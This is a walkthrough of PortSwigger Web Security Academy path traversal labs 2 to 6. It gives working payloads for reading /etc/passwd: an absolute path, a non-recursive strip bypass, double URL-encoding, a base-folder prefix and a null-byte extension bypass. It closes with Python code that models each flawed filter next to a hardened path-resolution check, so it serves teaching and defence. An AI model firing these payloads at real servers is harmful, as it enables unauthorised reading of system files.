Labs Covered
This write-up focuses on the following PRACTITIONER-level labs from the PortSwigger Web Security Academy:
2 File path traversal, traversal sequences blocked with absolute path bypass
This lab demonstrates how attackers can bypass basic traversal sequence blocking by supplying absolute paths instead of relative traversal patterns.
3 File path traversal, traversal sequences stripped non-recursively
This lab shows how flawed sanitization that strips traversal sequences only once (non-recursively) can be bypassed by chaining multiple traversal sequences.
4 File path traversal, traversal sequences stripped with superfluous URL-decode
This lab demonstrates how attackers can leverage multiple layers of URL encoding to bypass sanitization logic that strips traversal sequences after decoding.
5 File path traversal, validation of start of path
This lab shows how poorly implemented checks that validate only the start of a file path can be bypassed to access unauthorized files.
6 File path traversal, validation of file extension with null byte bypass
This lab demonstrates how attackers can use null byte injection to bypass file extension validation and retrieve unauthorized files.
LAB 2 - File path traversal, traversal sequences blocked with absolute path bypass
Lab Description :
Overview
Solution :
To retrieve an image, the application uses a GET request with the parameter filename:
To retrieve the contents of /etc/passwd, send the following request:
GET /image?filename=/etc/passwd
Lab is solved
LAB 3 - File path traversal, traversal sequences stripped non-recursively
Lab Description :
Solution :
When the webpage loads, it loads all the images. The captured request looks like this:
When we try this payload - ..././..././..././..././..././etc/passwd HTTP/2 - we get the contents of the file, because the server strips each ../ only once and the leftover characters re-form a traversal sequence.
Lab is solved
LAB 4 - File path traversal, traversal sequences stripped with superfluous URL-decode
Lab Description :
Solution :
The request which loads images looks like:
To retrieve /etc/passwd we need to double URL-encode the traversal characters, so that the server's own decode leaves %2e%2e%2f in place for the sanitizer to pass and the application's superfluous second decode turns it into ../:
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
Lab is solved
LAB 5 - File path traversal, validation of start of path
Lab Description :
Solution :
If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences to access restricted files.
For example:
filename=/var/www/images/../../../etc/passwd
In this lab, the website loads several images just like the previous labs. The request captured looks like this:
To retrieve /etc/passwd, we need the path to start with /var/www/images/ as required by the server.
Use the following request:
GET /image?filename=/var/www/images/../../../etc/passwd
Lab is solved
LAB 6 - File path traversal, validation of file extension with null byte bypass
Lab Description :
Solution :
If an application requires that the user-supplied filename must end with an expected file extension, such as .png, then it might be possible to use a null byte to effectively terminate the file path before the required extension.
For example:
filename=../../../etc/passwd%00.png
Note:
%00 is a null byte used to terminate a string in certain programming languages. When used in URL input, it can trick the application into treating the input as a different file type, bypassing the extension check.
The captured request which loads images on the website looks like this:
Here, like all the previous labs, it loads a .jpg image.
If we send a normal payload like ../../../etc/passwd, the server returns a 400 Bad Request.
This is because there is a security check being imposed here: the server only accepts inputs which end with a .jpg file extension.
So we craft a payload that satisfies the server's extension check and still retrieves /etc/passwd.
So the final payload will be ../../../etc/passwd%00.png
Lab is solved
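As an added example (not part of this write-up or of the labs' own server code), the following Python models the flawed filters that the descriptions of labs 2 to 6 state, runs each of the write-up's payloads through them, and puts a resolution-based check beside them. The base directory /var/www/images is the one the lab 5 text names; the filters are models of the described behaviour, not the labs' real code; 1.png is a constructed sample filename. The hardened check decides on the normalised path rather than on the raw string, so the absolute path (lab 2), the prefix trick (lab 5) and the null byte (lab 6) are rejected, while the lab 3 and lab 4 payloads are accepted only as literal filenames inside the image directory because nothing strips or decodes them a second time.

```python
import posixpath
from urllib.parse import unquote

# Assumed image directory: the base folder the lab 5 description names.
BASE = "/var/www/images"


def server_decode(wire_value):
    """The web server's one normal URL-decode of the filename query parameter."""
    return unquote(wire_value)


def naive_target(name):
    """What a file API opens once a flawed filter lets `name` through: join
    with BASE and let the OS collapse '..' (an absolute `name` discards BASE)."""
    return posixpath.normpath(posixpath.join(BASE, name))


# --- Flawed filters, modelled on what each lab description states ---------

def strip_once(name):
    """Lab 3: remove '../' a single time, so '..././' collapses into '../'."""
    return name.replace("../", "")


def strip_then_decode(name):
    """Lab 4: strip traversal sequences, then URL-decode a second, superfluous time."""
    return unquote(strip_once(name))


def prefix_only(name):
    """Lab 5: accept the string if it merely starts with the base folder."""
    return name if name.startswith(BASE + "/") else None


def extension_only(name):
    """Lab 6: accept the string if it ends with .png; a C-string file API
    later stops reading at the first NUL byte (modelled by the split)."""
    if not name.endswith(".png"):
        return None
    return name.split("\x00", 1)[0]


def flawed_target(lab, wire_value):
    """Run one lab's filter over the wire value; None models a 400 Bad Request."""
    name = server_decode(wire_value)
    if lab == 3:
        name = strip_once(name)
    elif lab == 4:
        name = strip_then_decode(name)
    elif lab == 5:
        name = prefix_only(name)
    elif lab == 6:
        name = extension_only(name)
    # lab 2: absolute paths are not filtered at all
    return None if name is None else naive_target(name)


# --- Hardened check: decide on the resolved path, not on the raw string ---

def safe_resolve(wire_value):
    """Decode once, refuse NUL bytes, normalise, and require the result to lie
    strictly inside BASE. Returns the path to open, or None to reject."""
    name = server_decode(wire_value)
    if "\x00" in name:
        return None
    full = posixpath.normpath(posixpath.join(BASE, name))
    if full == BASE or posixpath.commonpath([BASE, full]) != BASE:
        return None
    return full


PAYLOADS = {  # the write-up's own payloads, keyed by lab number
    2: "/etc/passwd",
    3: "..././..././..././..././..././etc/passwd",
    4: "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd",
    5: "/var/www/images/../../../etc/passwd",
    6: "../../../etc/passwd%00.png",
}

if __name__ == "__main__":
    for lab, wire in PAYLOADS.items():
        print(f"lab {lab}: flawed -> {flawed_target(lab, wire)}, "
              f"hardened -> {safe_resolve(wire)}")
    print("legitimate 1.png (constructed):", safe_resolve("1.png"))
```

Every flawed pipeline resolves to /etc/passwd, and lab 6's filter rejects the plain ../../../etc/passwd just as the write-up's 400 response shows. The hardened check is the usual fix for all five labs at once: normalise after a single decode, then compare the resolved path against the base directory instead of pattern-matching the input.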